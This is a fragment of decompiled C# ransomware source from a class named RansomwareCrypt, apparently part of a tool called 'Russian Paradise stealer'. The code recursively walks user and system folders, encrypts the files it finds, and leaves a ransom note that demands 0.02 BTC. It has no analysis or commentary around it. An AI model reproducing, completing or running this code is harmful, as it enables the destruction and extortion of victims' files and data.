// Token: 0x06000192 RID: 402 RVA: 0x0000B804 File Offset: 0x00009A04 internal static void Start() { if (!File.Exists(Environment.GetEnvironmentVariable("ProgramData") + "\\trig")) { string[] array = new string[] { Environment.GetFolderPath(Environment.SpecialFolder.Recent), Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), Environment.GetFolderPath(Environment.SpecialFolder.MyMusic), Environment.GetFolderPath(Environment.SpecialFolder.MyVideos), Environment.GetFolderPath(Environment.SpecialFolder.Personal), Environment.GetFolderPath(Environment.SpecialFolder.Favorites), Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments), Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures), Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic), Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos), Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory), Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), Environment.GetFolderPath(Environment.SpecialFolder.Personal), Environment.GetFolderPath(Environment.SpecialFolder.UserProfile), Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86), Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) }; for (int i = 0; i < array.Length; i++) { RansomwareCrypt.GetFile(array[i]); } } File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt", string.Concat(new string[] { "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer:", crypt.AESDecript(Settings.Stealer_version), "\nTo Decrypt: \n - Send 0.02 BTC to: ", Settings.bitcoin_keshel, "\n- Follow All Steps" }), Encoding.UTF8); Thread.Sleep(2000); MessageBox.Show(string.Concat(new string[] { "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer: ", Settings.Stealer_version, "\nTo Decrypt: \n - Send 0.02 BTC to: ", Settings.bitcoin_keshel, "\n - Follow All Steps" })); Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt"); }
// Token: 0x06000191 RID: 401 RVA: 0x0000B794 File Offset: 0x00009994 public static void GetFile(string string_1) { try { foreach (string text in Directory.GetFiles(string_1)) { if (!Path.GetExtension(text).Contains("loki")) { RansomwareCrypt.EncryptFiles(text); } } string[] array = Directory.GetDirectories(string_1); for (int i = 0; i < array.Length; i++) { RansomwareCrypt.GetFile(array[i]); } } catch (Exception) { } }